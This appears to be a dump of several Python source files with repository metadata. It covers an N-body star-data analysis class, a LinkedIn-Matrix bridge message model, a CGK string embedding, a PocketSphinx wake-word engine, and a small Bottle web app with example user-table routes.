self.lperp = self.lperp[:len(self.rad) - n]
self.energy = self.energy[:len(self.rad) - n]
self.pmra = self.pmra[:len(self.rad) - n]
self.pmdec = self.pmdec[:len(self.rad) - n]
self.rad = self.rad[:len(self.rad) - n]
self.updateArrayDict()
    def initial_energy(self):
        """Shift to the progenitor's rest frame and recompute the energy.

        Positions/velocities are re-centered on centerOfMass/centerOfMomentum
        and the energy is re-evaluated in the dwarf's Plummer potential.
        Mutates x/y/z, vx/vy/vz, r and energy in place.
        """
        self.x = self.x - self.centerOfMass[0]
        self.y = self.y - self.centerOfMass[1]
        self.z = self.z - self.centerOfMass[2]
        self.vx = self.vx - self.centerOfMomentum[0]
        self.vy = self.vy - self.centerOfMomentum[1]
        self.vz = self.vz - self.centerOfMomentum[2]
        self.r = (self.x**2 + self.y**2 + self.z**2)**0.5
        PE = galpy.potential.evaluatePotentials(plummer_pot, (self.x**2 + self.y**2)**0.5 * u.kpc, self.z*u.kpc, ro=10., vo=20.)
        KE = 0.5*(self.vx**2 + self.vy**2 + self.vz**2)
        self.energy = PE + KE
#data.plot(d1='var1', d2='var2'): data, str, str -> plot
#takes in the 2 coordinates of the data you want to plot and plots them in a 2d scatter plot
    def plot(self, d1='r', d2='z', overplot=False, s=5.0, color='k', marker='o', **kwargs):
        """Scatter-plot two per-star quantities selected by name.

        d1: the x-axis variable
        d2: the y-axis variable
        These can be x, y, z, vlos, l, b, etc. — any key of array_dict.
        When overplot is True, axis labels and plt.show() are skipped so the
        caller can layer more artists on the same figure.
        """
        array_dict = self.array_dict
        x_array = array_dict[d1]
        y_array = array_dict[d2]
        plt.scatter(x_array, y_array, s=s, c=color, marker=marker, **kwargs)
        #plt.xlim([-60000, 10000])
        #plt.ylim([-1000, 1000])
        if not overplot:
            plt.xlabel(d1)
            plt.ylabel(d2)
            plt.show()
#sticks a big fat red dot wherever the specific star is, given an id
    def trace_particle(self, id, d1='r', d2='z', overplot=False, s=50.0, color='r', marker='o', vel=False, **kwargs):
        """Highlight one star (by index) on a d1-vs-d2 scatter plot.

        id is the index of the star in the data structure.
        TODO: allow id matching to the id array in the data structure as well.
        When vel is True an arrow is drawn using vx and vz (hard-coded axes).
        """
        array_dict = self.array_dict
        x_array = array_dict[d1][id]
        y_array = array_dict[d2][id]
        plt.scatter(x_array, y_array, s=s, c=color, marker=marker, **kwargs)
        if vel:
            vx = array_dict['vx'][id]
            # NOTE(review): 'vy' here actually holds the vz component.
            vy = array_dict['vz'][id]
            #TODO: should alter to properly allow other velocities than what I'm hard coding
            #TODO: allow to change scaling of arrow length
            plt.arrow(x_array, y_array, vx/50, vy/50, color=color, head_width=1, **kwargs)
        if not overplot:
            plt.xlabel(d1)
            plt.ylabel(d2)
            plt.show()
#data.hist(d='r'): data, str -> histogram plot
#takes in the coordinate of the data you want in your histogram and then produces the relevant plot
    def hist(self, d='r', overplot=False, hist_range=None, hist_bins=10, *args, **kwargs):
        """Histogram one per-star quantity by name; returns plt.hist's tuple.

        d: the variable being binned — any key of array_dict.
        """
        array_dict = self.array_dict
        x_array = array_dict[d]
        h = plt.hist(x_array, range=hist_range, bins=hist_bins, *args, **kwargs)
        if not overplot:
            plt.xlabel(d)
            plt.show()
        return h
    def hist2d(self, d1='r', d2='lz', bins=10, range=None, density=False, weights=None, cmin=None, cmax=None, data=None, overplot=False, **kwargs):
        """2-D histogram of two per-star quantities; returns plt.hist2d's tuple.

        NOTE(review): the `range` parameter shadows the builtin; kept for
        signature compatibility with callers.
        """
        array_dict = self.array_dict
        x = array_dict[d1]
        y = array_dict[d2]
        h = plt.hist2d(x, y, bins=bins, range=range, weights=weights, cmin=cmin, cmax=cmax, data=data, **kwargs)
        if not overplot:
            plt.xlabel(d1)
            plt.ylabel(d2)
            plt.show()
        return h
def makeCSVFile(self, f_name):
#f: the filename for the output csv file
array_dict = self.array_dict
array_order = []
f = open(f_name, 'w')
#make the header
header = ''
for key in array_dict:
header += (key + ',')
header += '\n'
f.write(header)
#iterate through the data and print each line
i = 0
while i < len(self.id):
line = ''
for key in array_dict:
line += (str(array_dict[key][i]) + ',')
line += '\n'
f.write(line)
i += 1
print('Data output to ' + f_name)
    def updateArrayDict(self):
        """Rebuild array_dict so it points at the current attribute arrays.

        Must be called after any method replaces the per-star arrays
        (cutFirstN/cutLastN/append_data/append_point).
        """
        self.array_dict = {'id':self.id, 'x':self.x, 'y':self.y, 'z':self.z, 'l':self.l, 'b':self.b, 'r':self.r, 'vx':self.vx, \
                           'vy':self.vy, 'vz':self.vz, 'mass':self.mass, 'vtan':self.vtan, 'vlos':self.vlos, \
                           'msol':self.msol, 'ra':self.ra, 'dec':self.dec, 'd':self.d, 'vgsr':self.vgsr, \
                           'energy':self.energy, 'ltot':self.ltot, 'lz':self.lz, 'lperp':self.lperp, 'pmra':self.pmra, \
                           'pmdec':self.pmdec, 'rad':self.rad}
def append_data(self, append_data):
self.id = np.append(self.id, append_data.id)
self.x = np.append(self.x, append_data.x)
self.y = np.append(self.y, append_data.y)
self.z = np.append(self.z, append_data.z)
self.l = np.append(self.l, append_data.l)
self.b = np.append(self.b, append_data.b)
self.r = np.append(self.r, append_data.r)
self.vx = np.append(self.vx, append_data.vx)
self.vy = np.append(self.vy, append_data.vy)
self.vz = np.append(self.vz, append_data.vz)
self.mass = np.append(self.mass, append_data.mass)
self.vlos = np.append(self.vlos, append_data.vlos)
self.msol = np.append(self.msol, append_data.msol)
self.ra = np.append(self.ra, append_data.ra)
self.dec = np.append(self.dec, append_data.dec)
self.d = np.append(self.d, append_data.d)
self.vgsr = np.append(self.vgsr, append_data.vgsr)
self.vtan = np.append(self.vtan, append_data.vtan)
self.lz = np.append(self.lz, append_data.lz)
self.lperp = np.append(self.lperp, append_data.lperp)
self.energy = np.append(self.energy, append_data.energy)
self.pmra = np.append(self.pmra, append_data.pmra)
self.pmdec = np.append(self.pmdec, append_data.pmdec)
self.rad = np.append(self.rad, append_data.rad)
self.updateArrayDict()
def append_point(self, append_data, i):
self.id = np.append(self.id, append_data.id[i])
self.x = np.append(self.x, append_data.x[i])
self.y = np.append(self.y, append_data.y[i])
self.z = np.append(self.z, append_data.z[i])
self.l = np.append(self.l, append_data.l[i])
self.b = np.append(self.b, append_data.b[i])
self.r = np.append(self.r, append_data.r[i])
self.vx = np.append(self.vx, append_data.vx[i])
self.vy = np.append(self.vy, append_data.vy[i])
self.vz = np.append(self.vz, append_data.vz[i])
self.mass = np.append(self.mass, append_data.mass[i])
self.vlos = np.append(self.vlos, append_data.vlos[i])
self.msol = np.append(self.msol, append_data.msol[i])
self.ra = np.append(self.ra, append_data.ra[i])
self.dec = np.append(self.dec, append_data.dec[i])
self.d = np.append(self.d, append_data.d[i])
self.vgsr = np.append(self.vgsr, append_data.vgsr[i])
self.vtan = np.append(self.vtan, append_data.vtan[i])
self.lz = np.append(self.lz, append_data.lz[i])
self.lperp = np.append(self.lperp, append_data.lperp[i])
self.energy = np.append(self.energy, append_data.energy[i])
self.pmra = np.append(self.pmra, append_data.pmra[i])
self.pmdec = np.append(self.pmdec, append_data.pmdec[i])
self.rad = np.append(self.rad, append_data.rad[i])
self.updateArrayDict()
#read_output(f): filename -> data class
#reads a milky way at home output file and turns it into a data class
def readOutput(f, init_energy=False, subsample=1.0, pot_offset=0):
    """Read a MW@h N-body output file and return a Data object.

    f: the filename, formatted ('~/milkywayathome_client/nbody/...')
    init_energy: if True, parse centerOfMass/centerOfMomentum from the header
    subsample: the fraction [0.0, 1.0] of bodies to keep (random selection)
    pot_offset: constant subtracted from the potential energy

    Fixes: the file handle was never closed — now opened with a context
    manager.
    """
    comass = []
    comom = []
    # Temporary storage; indexed from 1 to skip the file's 'ignore' column.
    array_dict = {1: [], 2: [], 3: [], 4: [], 5: [], 6: [],
                  7: [], 8: [], 9: [], 10: [], 11: [], 12: []}
    with open(f) as fh:
        # Remove the header: this is info we don't need (mostly).
        if init_energy:
            for _ in range(4):
                fh.readline()
            # Read the center-of-mass/momentum line for initial_energy work.
            line = fh.readline().split(',')
            # NOTE(review): str.strip removes a *character set*, not a prefix;
            # it works for this file format but is fragile.
            line[0] = line[0].strip('centerOfMass = ')
            line[3] = line[3].strip('centerOfMomentum = ')
            comass = [float(line[0]), float(line[1]), float(line[2])]
            comom = [float(line[3]), float(line[4]), float(line[5])]
            fh.readline()
        else:
            for _ in range(5):
                fh.readline()
        # Place all the data from the file into the dictionary.
        for line in fh:
            if random.random() <= subsample:
                line = line.strip().split(',')
                i = 1
                while i < len(line):
                    array_dict[i].append(float(line[i]))
                    i += 1
    # Return the data class using the array dictionary we built.
    return Data(array_dict[1], array_dict[2], array_dict[3], array_dict[4], array_dict[5], array_dict[6], array_dict[7], array_dict[8], array_dict[9], array_dict[10], array_dict[11], array_dict[12], centerOfMass=comass, centerOfMomentum=comom, pot_offset=pot_offset)
#subset(data): data_object -> data_object
#takes in a data object and outputs a cut data object. Can cut within some radius or a rectangle cut. Can specify the axes, or if there is only 1 axis.
def subset(data, ax1='ra', ax2=None, rect=False, radius=None, center=None, corner1=None, corner2=None):
    """Return a new Data object containing only the points inside a cut.

    data: the Data object being cut
    ax1: the x-axis for the subset procedure
    ax2: the y-axis; if omitted, a 1-D cut on ax1 is performed
    rect: if True, use a rectangular cut (corner1 & corner2) instead of a radius
    radius: the radius for a radial cut
    center: center of the radial cut; tuple (x, y) in 2-D or a number in 1-D
    corner1: bottom-left corner for the rectangular cut, tuple (x, y)
    corner2: top-right corner for the rectangular cut, tuple (x, y)
    Returns None (after printing a message) when required arguments are missing.
    """
    array_dict = data.array_dict
    data_out = Data()
    if rect:
        if (not ax2) or (not corner1) or (not corner2):
            print('Must provide ax2, corner1 and corner2 for a rectangular cut')
            return None
        else: #do rectangular cut
            i = 0
            while i < len(data.ra):
                if corner1[0] < array_dict[ax1][i] < corner2[0] and corner1[1] < array_dict[ax2][i] < corner2[1]:
                    data_out.append_point(data, i)
                i+=1
            return data_out
    else: #do radius cut
        # NOTE(review): `not radius` also rejects a legitimate radius of 0.
        if (not radius) or center == None: #radius and/or center weren't provided
            print('Must provide radius and center for a radial cut')
            return None
        else:
            if ax2: #do 2d cut
                i = 0
                while i < len(data.ra):
                    if radius >= ((array_dict[ax1][i] - center[0])**2 + (array_dict[ax2][i] - center[1])**2)**0.5:
                        data_out.append_point(data, i)
                    i+=1
                return data_out
            else: #do 1d cut
                i = 0
                while i < len(data.ra):
                    if radius >= abs(array_dict[ax1][i] - center):
                        data_out.append_point(data, i)
                    i+=1
                return data_out
| 15,171 | -8 | 388 |
a6a3304cd956f131231e010acad553cbf8c132ec | 4,969 | py | Python | linkedin_matrix/db/message.py | sumnerevans/mautrix-linkedin | 4d9b3feb8b6d7b7cba534cfaef93582814586958 | [
"Apache-2.0"
] | 9 | 2021-06-10T11:22:37.000Z | 2021-07-14T14:31:35.000Z | linkedin_matrix/db/message.py | sumnerevans/linkedin-matrix | 4d9b3feb8b6d7b7cba534cfaef93582814586958 | [
"Apache-2.0"
] | 55 | 2021-06-04T03:04:53.000Z | 2021-07-13T03:01:15.000Z | linkedin_matrix/db/message.py | sumnerevans/mautrix-linkedin | 4d9b3feb8b6d7b7cba534cfaef93582814586958 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from typing import cast, List, Optional
from asyncpg import Record
from attr import dataclass
from linkedin_messaging import URN
from mautrix.types import EventID, RoomID
from .model_base import Model
@dataclass
| 28.394286 | 86 | 0.559066 | from datetime import datetime
from typing import cast, List, Optional
from asyncpg import Record
from attr import dataclass
from linkedin_messaging import URN
from mautrix.types import EventID, RoomID
from .model_base import Model
@dataclass
class Message(Model):
    """Database row linking a Matrix event to a LinkedIn message."""
    mxid: EventID
    mx_room: RoomID
    li_message_urn: URN
    li_thread_urn: URN
    li_sender_urn: URN
    li_receiver_urn: URN
    # Part index for LinkedIn messages bridged as multiple Matrix events.
    index: int
    timestamp: datetime
    _table_name = "message"
    # Column order must match the record tuples written by insert/bulk_create.
    _field_list = [
        "mxid",
        "mx_room",
        "li_message_urn",
        "li_thread_urn",
        "li_sender_urn",
        "li_receiver_urn",
        "index",
        "timestamp",
    ]
@classmethod
def _from_row(cls, row: Optional[Record]) -> Optional["Message"]:
if row is None:
return None
data = {**row}
li_message_urn = data.pop("li_message_urn")
li_thread_urn = data.pop("li_thread_urn")
li_sender_urn = data.pop("li_sender_urn")
li_receiver_urn = data.pop("li_receiver_urn")
timestamp = data.pop("timestamp")
return cls(
**data,
li_message_urn=URN(li_message_urn),
li_thread_urn=URN(li_thread_urn),
li_sender_urn=URN(li_sender_urn),
li_receiver_urn=URN(li_receiver_urn),
timestamp=datetime.fromtimestamp(timestamp)
)
    @classmethod
    async def get_all_by_li_thread_urn(
        cls,
        li_thread_urn: URN,
        li_receiver_urn: URN,
    ) -> List["Message"]:
        """Return every stored message in the given thread for this receiver."""
        query = Message.select_constructor("li_thread_urn=$1 AND li_receiver_urn=$2")
        rows = await cls.db.fetch(
            query,
            li_thread_urn.id_str(),
            li_receiver_urn.id_str(),
        )
        return [cast(Message, cls._from_row(row)) for row in rows if row]
    @classmethod
    async def get_by_li_message_urn(
        cls,
        li_message_urn: URN,
        li_receiver_urn: URN,
        index: int = 0,
    ) -> Optional["Message"]:
        """Look up one message by its LinkedIn URN, receiver and part index."""
        query = Message.select_constructor(
            "li_message_urn=$1 AND li_receiver_urn=$2 AND index=$3"
        )
        row = await cls.db.fetchrow(
            query,
            li_message_urn.id_str(),
            li_receiver_urn.id_str(),
            index,
        )
        return cls._from_row(row)
    @classmethod
    async def delete_all_by_room(cls, room_id: RoomID) -> None:
        """Delete every stored message belonging to the given Matrix room."""
        await cls.db.execute("DELETE FROM message WHERE mx_room=$1", room_id)
    @classmethod
    async def get_by_mxid(cls, mxid: EventID, mx_room: RoomID) -> Optional["Message"]:
        """Look up one message by its Matrix event id and room."""
        query = Message.select_constructor("mxid=$1 AND mx_room=$2")
        row = await cls.db.fetchrow(query, mxid, mx_room)
        return cls._from_row(row)
    @classmethod
    async def get_most_recent(
        cls,
        li_thread_urn: URN,
        li_receiver_urn: URN,
    ) -> Optional["Message"]:
        """Return the newest stored message in a thread, or None when empty."""
        query = (
            Message.select_constructor("li_thread_urn=$1 AND li_receiver_urn=$2 ")
            + " ORDER BY timestamp DESC"
            + " LIMIT 1"
        )
        row = await cls.db.fetchrow(
            query,
            li_thread_urn.id_str(),
            li_receiver_urn.id_str(),
        )
        return cls._from_row(row)
    async def insert(self) -> None:
        """Persist this message as one row; timestamp stored as epoch seconds."""
        query = Message.insert_constructor()
        await self.db.execute(
            query,
            self.mxid,
            self.mx_room,
            self.li_message_urn.id_str(),
            self.li_thread_urn.id_str(),
            self.li_sender_urn.id_str(),
            self.li_receiver_urn.id_str(),
            self.index,
            self.timestamp.timestamp(),
        )
    @classmethod
    async def bulk_create(
        cls,
        li_message_urn: URN,
        li_thread_urn: URN,
        li_sender_urn: URN,
        li_receiver_urn: URN,
        timestamp: datetime,
        event_ids: List[EventID],
        mx_room: RoomID,
    ) -> None:
        """Insert one row per Matrix event id for a multi-part message.

        The enumerate() position becomes each row's part index. No-op when
        event_ids is empty.
        """
        if not event_ids:
            return
        records = [
            (
                mxid,
                mx_room,
                li_message_urn.id_str(),
                li_thread_urn.id_str(),
                li_sender_urn.id_str(),
                li_receiver_urn.id_str(),
                index,
                timestamp.timestamp(),
            )
            for index, mxid in enumerate(event_ids)
        ]
        async with cls.db.acquire() as conn, conn.transaction():
            await conn.copy_records_to_table(
                "message",
                records=records,
                columns=cls._field_list,
            )
async def delete(self) -> None:
q = """
DELETE FROM message
WHERE li_message_urn=$1
AND li_receiver_urn=$2
AND index=$3"
"""
await self.db.execute(
q,
self.li_message_urn.id_str(),
self.li_receiver_urn.id_str(),
self.index,
)
| 3,936 | 765 | 22 |
e3ba67c416417347a7f1ba1c65b86a55a4f9dc51 | 180 | py | Python | settings/production.py | kittenswolf/aid-bot | a4ad50339e8bf147a09652273ca2c456289ddbe4 | [
"BSD-3-Clause"
] | 1 | 2020-12-19T00:56:28.000Z | 2020-12-19T00:56:28.000Z | settings/production.py | kittenswolf/aid-bot | a4ad50339e8bf147a09652273ca2c456289ddbe4 | [
"BSD-3-Clause"
] | null | null | null | settings/production.py | kittenswolf/aid-bot | a4ad50339e8bf147a09652273ca2c456289ddbe4 | [
"BSD-3-Clause"
] | 2 | 2020-06-29T18:12:09.000Z | 2021-04-11T19:47:40.000Z | # -*- coding: utf-8 -*-
import logging
logging_level = logging.DEBUG
| 11.25 | 29 | 0.55 | # -*- coding: utf-8 -*-
import logging
logging_level = logging.DEBUG
class bot:
    """Static bot configuration for the production environment."""
    # Prefix that chat messages must start with to be treated as commands.
    command_prefix = "p!"
    # Cog (extension) modules loaded when the bot starts.
    startup_cogs = [
        "cogs.play",
        "cogs.logs"
    ]
| 0 | 84 | 23 |
a1d4aef2d598e8e62048c518c515aa6fcc334d74 | 2,276 | py | Python | embed_cgk.py | LFhase/string-embed | da8eb60186fcd26a94734f265f79fa5fc5096f76 | [
"MIT"
] | 1 | 2021-01-11T18:44:16.000Z | 2021-01-11T18:44:16.000Z | embed_cgk.py | LFhase/string-embed | da8eb60186fcd26a94734f265f79fa5fc5096f76 | [
"MIT"
] | null | null | null | embed_cgk.py | LFhase/string-embed | da8eb60186fcd26a94734f265f79fa5fc5096f76 | [
"MIT"
] | null | null | null | import math
import time
import numpy as np
from tqdm import tqdm
from multiprocessing import Pool, cpu_count
| 27.756098 | 81 | 0.579086 | import math
import time
import numpy as np
from tqdm import tqdm
from multiprocessing import Pool, cpu_count
def _cgk(parameters):
x, (h, M) = parameters
i = 0
j = 0
out = np.empty(3 * M, np.int)
while j < 3 * M and i < len(x):
out[j] = x[i]
i += h[j][x[i]]
j += 1
return out
def cgk_string(h, strings, M):
    """CGK-embed every string in parallel with the shared step matrix h.

    Returns a 2-D numpy array with one embedding row per input string.
    """
    with Pool(cpu_count()) as pool:
        start_time = time.time()
        jobs = pool.imap(_cgk, zip(strings, [(h, M) for _ in strings]))
        cgk_list = list(tqdm(jobs, total=len(strings), desc="# CGK embedding"))
        print("# CGK embedding time: {}".format(time.time() - start_time))
        return np.array(cgk_list)
def random_seed(maxl, sig):
    """Draw the (3*maxl, sig) random 0/1 step matrix used by the CGK walk."""
    shape = (3 * maxl, sig)
    return np.random.randint(0, 2, size=shape)
def intersect(gs, ids):
    """Mean overlap size between ground-truth rows and retrieved-id rows."""
    overlaps = [len(np.intersect1d(g, list(row))) for g, row in zip(gs, ids)]
    return np.mean(overlaps)
def ranking_recalls(sort, gt):
    """Print a table of top-k recall for increasing numbers of probed items.

    sort: candidate ids per query, ranked by estimated distance
    gt: ground-truth neighbor ids per query, ranked by true distance
    """
    ks = [1, 5, 10, 20, 50, 100, 1000]
    # Probe counts: powers of two up to about twice the candidate-list length.
    Ts = [2 ** i for i in range(2 + int(math.log2(len(sort[0]))))]
    print("# Probed \t Items \t", end="")
    for top_k in ks:
        print("top-%d\t" % (top_k), end="")
    print()
    for t in Ts:
        print("%6d \t %6d \t" % (t, len(sort[0, :t])), end="")
        for top_k in ks:
            rc = intersect(gt[:, :top_k], sort[:, :t])
            print("%.4f \t" % (rc / float(top_k)), end="")
        print()
def hamming_distance(args):
    """Hamming distance from vector a to every row of matrix b."""
    a, b = args
    mismatches = np.not_equal(a, b)
    return np.count_nonzero(mismatches, axis=1)
def distance(xq, xb):
    """Pairwise Hamming distances between query and base embeddings.

    Iterates over the smaller side (transposing the result when needed) so
    each parallel job handles the larger matrix. Returns an array of shape
    (len(xq), len(xb)).
    """
    def _distance(xq, xb):
        # One job per row of xq, each comparing against all of xb.
        start_time = time.time()
        jobs = Pool().imap(hamming_distance, zip(xq, [xb for _ in xq]))
        dist = list(tqdm(jobs, total=len(xq), desc="# hamming counting"))
        print("# CGK hamming distance time: {}".format(time.time() - start_time))
        return np.array(dist).reshape((len(xq), len(xb)))
    if len(xq) < len(xb):
        return _distance(xb, xq).T
    else:
        return _distance(xq, xb)
def cgk_embedding(args, datahandler):
    """Run the full CGK pipeline: embed queries/base, rank, report recalls.

    NOTE(review): `args` is currently unused; kept for interface parity with
    the caller.
    """
    h = random_seed(datahandler.M, datahandler.C)
    xq = cgk_string(h, datahandler.xq.sig, datahandler.M)
    xb = cgk_string(h, datahandler.xb.sig, datahandler.M)
    dist = distance(xq, xb)
    sort = np.argsort(dist)
    ranking_recalls(sort, datahandler.query_knn)
| 1,974 | 0 | 184 |
baf797276a92fbd305a3c4fc7c578f4180394cd1 | 3,492 | py | Python | mycroft/interfaces/speech/wake_word_engines/pocketsphinx_engine.py | MatthewScholefield/mycroft-light | 95092ad3344ac95859952e94e280eb177e5c1c83 | [
"Apache-2.0"
] | 4 | 2018-03-30T01:27:04.000Z | 2018-11-23T10:06:34.000Z | mycroft/interfaces/speech/wake_word_engines/pocketsphinx_engine.py | MatthewScholefield/mycroft-light | 95092ad3344ac95859952e94e280eb177e5c1c83 | [
"Apache-2.0"
] | 3 | 2017-06-23T20:30:57.000Z | 2017-09-12T18:00:09.000Z | mycroft/interfaces/speech/wake_word_engines/pocketsphinx_engine.py | MatthewScholefield/mycroft-light | 95092ad3344ac95859952e94e280eb177e5c1c83 | [
"Apache-2.0"
] | 1 | 2017-06-27T18:35:37.000Z | 2017-06-27T18:35:37.000Z | # Copyright (c) 2019 Mycroft AI, Inc. and Matthew Scholefield
#
# This file is part of Mycroft Light
# (see https://github.com/MatthewScholefield/mycroft-light).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import tempfile
from os.path import join
from pocketsphinx import Decoder
from typing import Callable
from mycroft.interfaces.speech.wake_word_engines.wake_word_engine_plugin import WakeWordEnginePlugin
from mycroft.util.misc import download_extract_tar
| 36.757895 | 100 | 0.687572 | # Copyright (c) 2019 Mycroft AI, Inc. and Matthew Scholefield
#
# This file is part of Mycroft Light
# (see https://github.com/MatthewScholefield/mycroft-light).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import tempfile
from os.path import join
from pocketsphinx import Decoder
from typing import Callable
from mycroft.interfaces.speech.wake_word_engines.wake_word_engine_plugin import WakeWordEnginePlugin
from mycroft.util.misc import download_extract_tar
class PocketsphinxEngine(WakeWordEnginePlugin):
    """Wake-word engine backed by CMU PocketSphinx keyphrase spotting.

    Maintains a rolling audio buffer of roughly one wake-word length and
    re-runs keyphrase decoding on it (plus silence padding) for every chunk.
    """
    _config = {
        'phonemes': 'HH EY . M AY K R AO F T',
        'threshold': '1e-90',
        'wake_word_length': 1.2
    }
    # Seconds of silence padding appended when feeding audio to pocketsphinx.
    SILENCE_SEC = 0.01
    url = 'https://github.com/MatthewScholefield/pocketsphinx-models/raw/master/{lang}.tar.gz'
    def __init__(self, rt, on_activation: Callable):
        """Download the language model (if needed) and configure the decoder."""
        super().__init__(rt, on_activation)
        lang = rt.config['lang']
        self.hmm_folder = join(rt.paths.user_config, 'models', lang)
        self.rate, self.width = self.rec_config['sample_rate'], self.rec_config['sample_width']
        self.padding = b'\0' * int(self.rate * self.width * self.SILENCE_SEC)
        self.buffer = b''
        download_extract_tar(self.url.format(lang=lang), self.hmm_folder)
        config = Decoder.default_config()
        config.set_string('-hmm', self.hmm_folder)
        config.set_string('-dict', self._create_dict(self.wake_word, self.config['phonemes']))
        config.set_string('-keyphrase', self.wake_word)
        config.set_float('-kws_threshold', float(self.config['threshold']))
        config.set_float('-samprate', self.rate)
        config.set_int('-nfft', 2048)
        config.set_string('-logfn', '/dev/null')
        self.ps = Decoder(config)
    @staticmethod
    def _create_dict(key_phrase, phonemes):
        """Write a one-entry pronunciation dict to a temp file; return its path."""
        fd, file_name = tempfile.mkstemp()
        with os.fdopen(fd, 'w') as f:
            f.write(key_phrase + ' ' + phonemes.replace(' . ', ' '))
        return file_name
    def _transcribe(self, raw_audio):
        """Run one decoding pass over raw_audio; return the hypothesis or None."""
        self.ps.start_utt()
        self.ps.process_raw(raw_audio, False, False)
        self.ps.end_utt()
        return self.ps.hyp()
    def startup(self):
        # Pre-fill the rolling buffer with one wake-word length of silence.
        self.buffer = b'\0' * int(self.width * self.rate * self.config['wake_word_length'])
    def shutdown(self):
        # Drop any buffered audio.
        self.buffer = b''
    def pause_listening(self):
        pass
    def continue_listening(self):
        pass
    def update(self, raw_audio: bytes):
        """Feed one chunk of audio; fire on_activation when the wake word appears."""
        # Slide the fixed-length buffer forward by the new chunk.
        self.buffer = self.buffer[len(raw_audio):] + raw_audio
        transcription = self._transcribe(self.buffer + self.padding)
        if transcription and self.wake_word in transcription.hypstr.lower():
            self.on_activation()
| 1,689 | 564 | 23 |
c6be566db161d80cfe06c759c8d713915e91c3f5 | 2,680 | py | Python | app/home/__init__.py | andres-hurtado-lopez/lramprodvent | 257533d4ec07dc9783bd706d6af7ec0ec22fd9c0 | [
"MIT"
] | null | null | null | app/home/__init__.py | andres-hurtado-lopez/lramprodvent | 257533d4ec07dc9783bd706d6af7ec0ec22fd9c0 | [
"MIT"
] | null | null | null | app/home/__init__.py | andres-hurtado-lopez/lramprodvent | 257533d4ec07dc9783bd706d6af7ec0ec22fd9c0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import template, redirect
import utils
| 36.712329 | 187 | 0.666045 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import template, redirect
import utils
def GET(**params):
return template('home_index.html')
def ejemplos_bootstrap_grid_GET(**params):
return template("ejemplos_bootstrap_grid.html")
def ejemplos_bootstrap_fixed_GET(**params):
    """Serve the Bootstrap fixed-layout example page."""
    return template("ejemplos_bootstrap_fixed.html")
def ejemplos_bootstrap_fluid_GET(**params):
    """Serve the Bootstrap fluid-layout example page."""
    return template("ejemplos_bootstrap_fluid.html")
def ejemplos_bootstrap_responsive_GET(**params):
    """Serve the Bootstrap responsive-layout example page."""
    return template("ejemplos_bootstrap_responsive.html")
def tabla_ejemplo_GET(**params):
    """Render the paginated example users table.

    Optional query params:
      - ``filter``: substring matched against ``users.user`` (parameterized
        SQL LIKE — no injection risk).
      - ``table_usuarios_page``: 1-based page number (default 1).
    """
    like_pattern = '%' + params.get('filter', '') + '%'  # renamed: `filter` shadowed the builtin
    table = utils.RenderTable(
        'SELECT user, full_name FROM users WHERE user like %s ORDER BY user',
        (like_pattern,),
        # Fix: header row previously emitted a malformed closing tag ("...Eliminar</td</tr>").
        '<tr><td>Usuario</td><td>Nombre</td><td>Eliminar</td></tr>',
        '<tr><td><a href="/web/menu_principal/formulario_ejemplo?user={user}">{user}</td><td>{full_name}</td><td><a href="#" onclick="delete_record(\'{user}\');">Eliminar</a></td></tr>',
        'table table-bordered',
        5,
        int(params.get('table_usuarios_page', '1'))
    )
    return template('tabla_ejemplo.html', title='Listado Tablas', table=table)
def formulario_ejemplo_GET(**params):
    """Render the example user form.

    Edit mode when ``user`` is given, create mode when ``new == 'true'``,
    otherwise redirect back to the table listing.
    """
    db = utils.ConnectDB()
    requested_user = params.get('user')
    if requested_user:
        # Edit mode: load the record and pre-fill the form.
        db.execute('SELECT user, full_name FROM users WHERE user = %s', (requested_user,))
        return template("formulario_ejemplo.html",
                        title='Formulario',
                        userdata=db.fetchone(),
                        create='false')
    if params.get('new') == 'true':
        # Create mode: present an empty form.
        blank_record = {'user': '', 'full_name': ''}
        return template("formulario_ejemplo.html",
                        title='Formulario',
                        userdata=blank_record,
                        create='true')
    redirect('/web/menu_principal/tabla_ejemplo')
def formulario_ejemplo_POST(**params):
    """Persist the example form: INSERT when ``create == 'true'``, otherwise
    UPDATE the existing row; then redirect back to the form."""
    db = utils.ConnectDB()
    user = params.get('user')
    full_name = params.get('full_name')
    if params.get('create') == 'true':
        db.execute('INSERT INTO users (user, full_name) VALUES (%s, %s)', (user, full_name))
    else:
        db.execute('UPDATE users SET full_name = %s WHERE user = %s', (full_name, user))
    db.execute('COMMIT')
    redirect('/web/menu_principal/formulario_ejemplo')
def formulario_ejemplo_DELETE(**params):
    """Delete a user row and answer JSON.

    Returns ``{'response': True, 'message': 'ok'}`` on success, or the
    repr of the error so the client-side caller can display it.

    Fix: ``except Exception, e:`` is Python-2-only syntax (a SyntaxError on
    Python 3); replaced with the ``as`` form, valid on Python 2.6+ and 3.
    """
    try:
        db = utils.ConnectDB()
        db.execute('DELETE FROM users WHERE user = %s', (params.get('user', ''),))
        db.execute('COMMIT')
        message = 'ok'
    except Exception as e:
        message = repr(e)
    return {'response': True, 'message': message}
def typeahead_GET(**params):
    """Serve the typeahead (autocomplete) example page."""
    return template('typeahead.html')
def ejemplo_escaneo_codigo_barras_GET(**params):
    """Serve the barcode-scanning example page."""
    return template("ejemplo_escaneo_codigo_barras.html")
| 2,329 | 0 | 253 |
